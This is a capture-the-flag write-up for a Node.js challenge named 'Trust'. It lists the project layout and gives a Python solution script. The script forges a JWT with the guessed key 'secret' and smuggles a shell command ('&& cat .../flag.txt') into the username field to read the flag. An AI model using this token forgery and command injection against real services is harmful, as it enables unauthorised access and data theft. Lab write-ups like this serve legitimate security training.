# Trust

## [Project ](https://github.com/Diefunction/tcc-ctf/tree/main/trust)

#### Structure

```
trust
├── src/ 
│   ├── controllers/ 
│       └── users.js 
│   ├── middlewares/ 
│       ├── authenticate.js 
│       └── error.js 
│   └── routes/ 
│       └── users.js 
│   ├── app.js 
│   ├── package.json 
│   └── flag.txt 
├── .dockerignore
└── Dockerfile 

```

## Solution

Install pip

```
sudo apt install python3-pip
```

Install pyjwt and requests

```
python3 -m pip install pyjwt requests
```

Exploit

```python
import jwt
from requests import get

host = '127.0.0.1'
port = '8000'

payload = {
    'username': ' > /dev/null && cat /usr/src/app/flag.txt'
}
key = 'secret'

headers = {'Authorization': jwt.encode(payload = payload, key = key)}

flag = get(f'http://{host}:{port}/api/user/system/exist', headers = headers).text
print(flag)
```

Run the script

```
python3 exploit.py
```

Output

```
{"message":"username exists","output":"TCC{34$Y_c0mmAND_1nJ3c710n}"}
```